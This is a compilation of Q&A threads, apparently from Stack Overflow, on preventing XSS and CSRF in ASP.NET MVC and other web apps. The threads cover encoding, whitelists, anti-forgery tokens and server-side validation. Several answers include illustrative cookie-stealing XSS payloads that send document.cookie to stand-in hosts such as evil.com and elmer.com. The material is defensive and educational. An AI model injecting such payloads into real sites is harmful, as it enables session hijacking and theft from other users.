I've been reading the ASP.NET MVC learning site about JavaScript injection, and man, it is an eye opener.
I had never even realized or thought about someone using JavaScript to pull off some nasty injection attacks.
It however left me with some unanswered questions.
First
When do you use Html.Encode? Do you use it only when you are going to display information that a user (or some other user) has submitted?
Or do I use it for everything? Say I have a form that a user submits and this information will never be displayed to any of the users; should I still be using Html.Encode?
And how would I do it? I am not sure how to apply Html.Encode inside, say, an Html.TextBox().
Second
Say I have a rich HTML editor on my site. The user is allowed to use it to make things bold and so on. Now I want to display that information back to the user through a label. I can't Html.Encode it, since then the bold and other formatting would not be rendered.
Yet I can't leave it as it is, since what would stop a user from adding some JavaScript attack?
So what would I do? Use Regex to filter out all tags?
Third
There is also another helper you can use called "AntiForgeryToken". When would you use that one?
Thanks
Edit
Almost everyone says to use a "white list" and "black list". How would I write such a list and compare it to incoming values? (Examples in C# would be nice.)
Good question!
For the first answer, I would consider looking here at a previously asked question. As the answer discusses, using HTML Encode will not protect you completely against all XSS attacks. To help with this, you should consider using the Microsoft Web Protection Library (AntiXSS in particular), available from Microsoft.
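As a rough illustration only (the exact class and method names differ between AntiXSS versions, so treat this call as an assumption rather than the definitive API):

using Microsoft.Security.Application;

string userInput = "<script>alert('hi')</script>";
// assumed API surface: AntiXSS 3.x exposed AntiXss.HtmlEncode; later versions use Encoder.HtmlEncode
string safe = AntiXss.HtmlEncode(userInput);   // whitelist-based encoding, stricter than Html.Encode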
As has already been mentioned, using a list of allowed tags is the best thing to do, stripping everything else out.
The AntiForgeryToken helper works to prevent request forgery (CSRF): it gives the user a cookie which is validated against the rendered form field when the page is posted. There's no reason I'm aware of that you can't use it in all of your forms.
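For reference, the usual pattern looks something like this (the controller and action names here are just placeholders); the helper writes both the cookie and a matching hidden field, and the attribute checks them when the form is posted:

<% using (Html.BeginForm("Save", "Comments")) { %>
    <%= Html.AntiForgeryToken() %>
    <%= Html.TextBox("comment") %>
    <input type="submit" value="Save" />
<% } %>

and in the controller:

[HttpPost]
[ValidateAntiForgeryToken]
public ActionResult Save(string comment)
{
    // if the hidden field and the cookie don't match, the framework throws
    // before this code ever runs
    return RedirectToAction("Index");
}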
Use HTML Encode for any data being displayed that has been submitted by a user. You don't need to use it when writing to the database, otherwise you would end up storing oddly encoded data like: Simon &amp; Sons. Really, I don't see the harm in using it on any content written to the page dynamically.
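In an ASPX view that means encoding at the point of output, for example (the model property name is made up):

<%-- stored raw in the database as: Simon & Sons --%>
<%= Html.Encode(Model.CompanyName) %>  <%-- rendered in the HTML source as: Simon &amp; Sons --%>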
Use a list of allowed tags and discard everything else for your HTML editor. As people said, use a whitelist.
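To address the edit in the question, here is a minimal C# sketch of whitelist-style tag filtering. The allowed-tag list, and the regex approach itself, are only illustrative; it does not handle attributes (e.g. onclick) or malformed markup, so a dedicated sanitizer library is the safer choice in practice:

using System;
using System.Text.RegularExpressions;

public static class HtmlWhitelist
{
    // tags we allow through; anything else is stripped out
    private static readonly string[] AllowedTags = { "b", "i", "u", "strong", "em", "p", "br" };

    public static string Sanitize(string input)
    {
        // matches any opening or closing tag, e.g. <b>, </p>, <script src="...">
        return Regex.Replace(input, @"</?([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>", match =>
        {
            string tag = match.Groups[1].Value.ToLowerInvariant();
            return Array.IndexOf(AllowedTags, tag) >= 0 ? match.Value : string.Empty;
        });
    }
}

// e.g. HtmlWhitelist.Sanitize("<b>Hi</b><script>steal()</script>") returns "<b>Hi</b>steal()"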
The third one is meant to prevent a cross-site request forgery (CSRF) attack. You use it to stop people being able to do a POST by riding on a user's existing cookie. Your site may require an authenticated cookie before accepting a post, but a malicious site could get the user's browser to submit a form to your site while that cookie is still valid, claiming to be them.
See here for more:
http://haacked.com/archive/2009/04/02/anatomy-of-csrf-attack.aspx
How to use it:
http://blog.codeville.net/2008/09/01/prevent-cross-site-request-forgery-csrf-using-aspnet-mvcs-antiforgerytoken-helper/
Always validate the input received against a whitelist, not a blacklist; with a blacklist you could, and probably will, come up against encoding issues.
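As a concrete example of whitelisting input (the allowed character set and length below are only an illustration):

using System.Text.RegularExpressions;

public static class InputWhitelist
{
    // allow letters, digits, spaces, apostrophes and hyphens, 1-50 characters
    private static readonly Regex NamePattern = new Regex(@"^[a-zA-Z0-9 '\-]{1,50}$");

    public static bool IsValidName(string input)
    {
        return !string.IsNullOrEmpty(input) && NamePattern.IsMatch(input);
    }
}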
Do not rely on client-side validation to validate user input. Client-side validation is great for helping the user enter correct data, but a malicious user will simply not use it and can bypass it entirely: as you can see, JavaScript is very easy to change or modify on any HTML page, and it can also be disabled in the browser. Client-side validation should never be considered a security fix, so always repeat the checks in your server-side code.
Additionally, validate the input every time, not just when the data is initially accepted. For example, if you set a cookie, make sure that cookie still holds the same, correct value on each and every request. A malicious user could modify the value at any time during the session.
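A rough sketch of what that per-request re-check could look like inside an ASP.NET MVC controller (the cookie and session keys are invented for the example):

using System.Web;
using System.Web.Mvc;

public class SecureController : Controller
{
    // reject the request if the cookie is missing or no longer matches
    // the value the server originally issued
    protected bool CookieIsValid()
    {
        HttpCookie cookie = Request.Cookies["displayName"];
        string expected = Session["displayName"] as string;
        return cookie != null && expected != null && cookie.Value == expected;
    }
}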
There are various levels of security that can be implemented based on the design considerations of your application.
I would go with the following basic rules:
Sanitize all input, removing known malicious sections (for instance, <script> tags in a rich HTML editor). Regex based pattern matching is commonly used for this kind of sanitization.
Remove any input values that are not in your whitelist of allowed values.
Encode any HTML before storing in the database and Decode it back when it is being retrieved for display.
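A minimal illustration of that encode-on-store / decode-on-retrieve step (many people prefer storing raw data and encoding only at render time, so treat this purely as a mechanical example):

using System.Web;

string userInput = "Simon & <b>Sons</b>";
string stored = HttpUtility.HtmlEncode(userInput);   // "Simon &amp; &lt;b&gt;Sons&lt;/b&gt;"
string display = HttpUtility.HtmlDecode(stored);     // back to the original text for display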
Edit: @Phoenix talks about validation in this context, so I thought I'd add this. I have said this before and I reiterate: I am not against script-based validation. I only caution people not to rely on it exclusively. A common design pattern is to validate basic criteria using script-based validation and then apply rigorous validation on the server side when the data is submitted.
Related
If you are going to validate a CakePHP form using AJAX, so as not to reload the page, do you have to define the validation array in the model? Thank you.
You will always want to validate everything, because you should never trust any input. This is a golden rule no matter what kind of program you write, website or not; I would not even trust the input coming from a sensor, for example, without validating it. Besides the server-side validation, you should also use the Security Component of CakePHP to secure your forms and site against attacks. You might want to use Google to look up a few of the attacks that the Security Component prevents, and check the manual for a list.
JavaScript runs only in your browser. You could simply disable JavaScript and enter whatever you want. Furthermore, you can edit the markup, add an additional input there, and submit that changed form. Now take a guess at what happens when you add a hidden field "role" and give it the value "admin", for example...
I have a web page which needs to do the following:
dynamically create an HTML fragment using JavaScript
open a new window
display the HTML in the new window
My first approach used document.write to copy the HTML into the window. This works in most cases, but it causes problems with Internet Explorer when the original window has set document.domain. Plus document.write tends to be discouraged these days.
So my second approach was to put the HTML into a hidden form, set the form's target to the new window, and POST the form. This means I need a script on the server to respond to the form, by echoing the POSTed content.
But this is dangerous, since someone could make a request that includes <script> tags in the content. How can I avoid the potential XSS risk? I guess I could filter out things like <script>, although that seems clumsy. If I were creating the HTML on the server, I could encrypt it, or add some token that can only be verified on the server. But I'm creating it on the client.
EDIT: Thanks for the filtering suggestions so far. I may choose to go this route, but I'm wondering: what if I don't want any restrictions on the HTML I create? Is there any way I can validate that the document was created by my page?
Try HTML Purifier.
Edit:
"Is there any way I can validate that the document was created by my page?"
Not unless you create another copy of the html server-side and compare. Anything in your script can be viewed by the user, although you can make it difficult for non-technical users. Anything that client-side Javascript can do, a malicious user can do on a Javascript console.
Even if you somehow verified that the request came from your script, a malicious user can modify your script using a Javascript console by inserting lines of code that produce a dangerous request. All GET and POST data must be treated as malicious.
Try PHPIDS.
PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application. The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules any attack is given a numerical impact rating which makes it easy to decide what kind of action should follow the hacking attempt. This could range from simple logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the user’s session.
On a site, the user can enter an email account to gain access. I do not want this to be hacked by script kiddies.
The input items are generated by JavaScript and posted via AJAX. Do I need things like fuzzy word matches in this environment?
Any time you give the user the possibility to input something, every time your application expects some data from the user, that data can be forged.
No matter how your form is built, your web server expects some data; that form and data can be forged or faked, so you must be prepared for anything that could be sent to your application.
Still, you can add some levels of security, using, for example :
HTTPS so communications cannot be listened to
A nonce in your form, to make things harder when it comes to forging forms
I assume you mean adequate security against someone writing a script to fish for valid e-mails using a brute-force style attack? If so then no: your presumption that "script kiddies" are incapable of either scripting a full-fledged browser instance that can execute your JavaScript content, or determining what URL your AJAX ultimately submits to and then forging requests, is false.
If you want to protect against these kinds of attacks, then the only effective way to do so is to add code on the server side. For instance, you could track the number of incorrect access attempts posted per IP address, and block requests (for like an hour or so) from any IP that posts more than, say, 10 invalid requests in a 5-minute time span. Then you are reasonably safe against this kind of attack until you come across someone with a million-IP bot-net and a grudge against your site.
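A naive in-memory sketch of that kind of throttling (the thresholds, the storage, and thread safety are all left as assumptions; a real implementation would need locking, expiry, and probably a shared store):

using System;
using System.Collections.Generic;

public class FailedAttemptTracker
{
    private readonly Dictionary<string, List<DateTime>> attempts = new Dictionary<string, List<DateTime>>();

    public bool IsBlocked(string ip)
    {
        List<DateTime> recent;
        if (!attempts.TryGetValue(ip, out recent)) return false;

        // keep only failures from the last 5 minutes; more than 10 of them means block
        recent.RemoveAll(t => t < DateTime.UtcNow.AddMinutes(-5));
        return recent.Count > 10;
    }

    public void RecordFailure(string ip)
    {
        List<DateTime> recent;
        if (!attempts.TryGetValue(ip, out recent))
        {
            recent = new List<DateTime>();
            attempts[ip] = recent;
        }
        recent.Add(DateTime.UtcNow);
    }
}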
Another form of protection is to send some random code from the server to the client that gets submitted back with the form (for instance, as a hidden field), and code the server so that ignores any form submits that do not include this code. This solution works best if you have some way of verifying that the user is trustworthy before you display the form (so it's not really useful in the context of a login form, but it could help secure any post-login forms that you may have). Otherwise it is not too hard for an attacker to compose a script that just grabs a code from your server, and includes it in a forged request.
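A bare-bones version of that hidden-code idea, assuming session state is available (the field and key names are made up; ASP.NET MVC's AntiForgeryToken helper mentioned earlier does essentially this for you):

// when rendering the form
string token = Guid.NewGuid().ToString("N");
Session["formToken"] = token;
// emit it into the page as <input type="hidden" name="formToken" value="..." />

// when the form comes back
string posted = Request.Form["formToken"];
string expected = Session["formToken"] as string;
bool looksGenuine = expected != null && posted == expected;
// ignore (or log) the submission when looksGenuine is false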
JavaScript + AJAX forms are just a fancier kind of form. It's still a request with POST/GET data, so the same security measures should be undertaken as for a normal HTML form.
Whether you use AJAX or basic HTTP requests, don't send back data you don't want users to see. Don't offer services or functionality by means of JavaScript/AJAX that you wouldn't offer by means of basic HTTP requests.
Script injection does not need JavaScript/AJAX vulnerabilities; it just needs insecure backend code that doesn't catch and eliminate injected code.
I just happen to read the joel's blog here...
So for example if you have a web page that says “What is your name?” with an edit box and then submitting that page takes you to another page that says, Hello, Elmer! (assuming the user’s name is Elmer), well, that’s a security vulnerability, because the user could type in all kinds of weird HTML and JavaScript instead of “Elmer” and their weird JavaScript could do narsty things, and now those narsty things appear to come from you, so for example they can read cookies that you put there and forward them on to Dr. Evil’s evil site.
Since JavaScript runs on the client end, all it can access or do is on the client end.
It can read information stored in hidden fields and change it.
It can read, write or manipulate cookies...
But I feel this information is available to him anyway (if he is smart enough to pass JavaScript in a textbox), so we are not empowering him with new information or providing him undue access to our server...
Just curious to know whether I miss something. Can you list the things that a malicious user can do with this security hole.
Edit: Thanks to all for the enlightenment. As kizzx2 pointed out in one of the comments, I was overlooking the fact that JavaScript written by User A may get executed in the browser of User B under numerous circumstances, in which case it becomes a great risk.
Cross-site scripting is a really big issue with JavaScript injection.
It can read, write or manipulate cookies
That's the crucial part. You can steal cookies like this: simply write a script which reads the cookie and sends it to some evil domain using AJAX (with JSONP to overcome the cross-domain issues; actually, I think you don't even need to bother with AJAX, a simple <img src="http://evil.com/?cookieValue=123"> would suffice) and email yourself the authentication cookie of the poor guy.
I think what Joel is referring to in his article is that the scenario he describes is one which is highly vulnerable to Script Injection attacks, two of the most well known of which are Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF).
Since most web sites use cookies as part of their authentication/session management solution, if a malicious user is able to inject malicious script into the page markup that is served to other users, that malicious user can do a whole host of things to the detriment of the other users, such as steal cookies, make transactions on their behalf, replace all of your served content with their own, create forms that imitate your own and post data to their site, etc, etc.
There are answers that explain CSRF and XSS. I'm the one to say that for the particular quoted passage, there is no security threat at all.
That quoted passage is simple enough -- it allows you to execute some JavaScript. Congratulations -- I can do the same with Firebug, which gives me a command line to play with, instead of having to fake it by abusing a text box that some web site gives me.
I really think Joel wasn't really sober when writing that. The example was just plain misleading.
Edit some more elaborations:
We should keep several things in mind:
Code cannot do any harm unless executed.
JavaScript can only be executed on the client side (yes, there is server-side JavaScript, but apparently not in the context of this question/article).
If the user writes some JavaScript, which then gets executed on his own machine -- where's the harm? There is none, because he can execute JavaScript from Firebug anytime he wants without going through a text box.
Of course there are CSRF, which other people have already explained. The only case where there is a threat is where User A can write some code which gets executed in User B's machine.
Almost all answers that directly answer the question "What harm can JavaScript do?" explain in the direction of CSRF -- which requires User A being able to write code that User B can execute.
So here's a more complete, two part answer:
If we're talking about the quoted passage, the answer is "no harm"
I do not interpret the passage to mean something like the scenario described above, since it is very obviously talking about a basic "Hello, Elmer" example. Synthetically reading implicit meanings into the passage just makes it more misleading.
If we're talking about "What harm can JavaScript do, in general," the answer is related to basic XSS/CSRF
Bonus: here are a couple more real-life scenarios of how this (User A writes JavaScript that gets executed on User B's machine) can take place
A Web page takes parameters from GET. An attacker can lure a victim to visit http://foo.com/?send_password_to=malicious.attacker.com
A Web page displays one user's generated content verbatim to other users. An attacker could put something like this in his avatar's URL: <script>send_your_secret_cookies_to('http://evil.com')</script> (this needs some tweaking to get past quoting and so on, but you get the idea)
Cause your browser to send requests to other services using your authentication details and then send the results back to the attacker.
Show a big picture of a penis instead of your company logo.
Send any personal info or login cookies to a server without your consent.
I would look at the Wikipedia article on JavaScript security. It covers a number of vulnerabilities.
If you display data on your page that comes from a user without sanitizing that data first, it's a huge security vulnerability, and here's why:
Imagine that instead of "Hello, Elmer!", that user entered
<script src="http://a-script-from-another-site.js" type="text/javascript"></script>
and you're just displaying that information on a page somewhere without sanitizing it. That user can now do anything he wants to your page without other users coming to that page being aware. They could read the other users' cookie information and send it anywhere they want, they could change your CSS and hide everything on your page and display their own content, they could replace your login form with their own that sends information to any place they wish, etc. The real danger is when other users come to your site after that user. No, they can't do anything directly to your server with JavaScript that they couldn't do anyway, but what they can do is get access to information from other people that visit your site.
If you're saving that information to a database and displaying it, all users who visit the site will be served that content. If it's just content coming from a form that isn't actually saved anywhere (you submit a form and read the data from a GET or POST request), then the user could maliciously craft a URL to your site that contains JavaScript (oursite.com/whatsyourname.php?username=Elmer, but with JavaScript instead of Elmer) and trick another user into visiting that link.
For an example with saving information in a database: let's say you have a forum that has a log in form on the front page along with lists of posts and their user names (which you aren't sanitizing). Instead of an actual user name, someone signs up with their user name being a <script> tag. Now they can do anything on your front page that JavaScript will accomplish, and every user that visits your site will be served that bit of JavaScript.
A little example shown to me a while ago during an XSS class...
Suppose Elmer is an amateur hacker. Instead of writing his name in the box, he types this:
<script>$.ajax("http://elmer.com/save.php?cookie=" + document.cookie);</script>
Now, if the server keeps a log of the values written by users and some admin logs in and views those values... Elmer will get the cookie of that administrator!
Let's say a user reads your source code and makes his own tweak of, for instance, an AJAX call, posting unwanted data to your server. Some developers are good at protecting direct user input, but might not be as careful protecting database calls made from an AJAX call, where the dev thinks he has control over all the data being sent through the call.
What's the best way to prevent javascript injections in a VB.NET Web Application? Is there some way of disabling javascript on the pageload event?
Recently, part of the security plan for our vb.net product was to simply disable buttons on the page that weren't available to the specific user. However, I informed the guy who thought of the idea that typing
javascript:alert(document.getElementById("Button1").disabled="")
in the address bar would re-enable the button. I'm sure that someone else has run into issues like this before, so any help is appreciated. Thanks!
Update:
Aside from validating user input, how can I protect the website from being toyed with from the address bar?
Any changes you make to the client-side behavior of your application are superficial and not secure at all. You should not rely upon these. They are nice to stop 99% of users, but it is trivially easy to bypass them. You should be checking whether a user has the right privileges for the action on the server side when the action is called, so that if someone did decide to re-enable the button themselves they would not be able to do whatever the button is meant to do. You have no control over what someone can do to the page with javascript, so you should never trust anything coming from the client.
Response to update: You can't in any practical way, which is exactly what the problem is. Once the website is in their browser, it's a free-for-all and they can have a go at it. Which is why your program should validate everything server side, every time.
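For example, in the code-behind (shown in C# for consistency with the rest of the thread, though the same applies in VB.NET; the role name is just a placeholder), the handler behind that button should repeat the privilege check regardless of whether the button was disabled on the client:

protected void Button1_Click(object sender, EventArgs e)
{
    // re-check on the server; re-enabling the button from the address bar gains the attacker nothing
    if (!User.IsInRole("Administrators"))
    {
        Response.StatusCode = 403;
        return;
    }

    // ... perform the privileged action ...
}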
The most important item to consider is HTML encoding the user input. If the user enters <script> it'll get converted to &lt;script&gt;, etc.
Update: If expecting input from the URL / query string, validate that data rigorously. If possible, whitelist the data received. With a whitelist, you're ensuring that only what you deem correct and safe is a viable submission.
Never trust the users' input.
Always validate user input.
Never trust data from the clients. Always validate data and permissions on the server side, where you are in control. Remember that the user (or any other application) can send to you whatever data they want to.
It doesn't matter what you do to lock down the interface via JavaScript, your data can always be manipulated somehow. There are various tools, such as Fiddler, which can be used to modify or recreate postbacks/requests.
Even if you find a way to lock things down, you're in an arms race if your data is important enough to the attacker. The most viable option is to validate your input server side.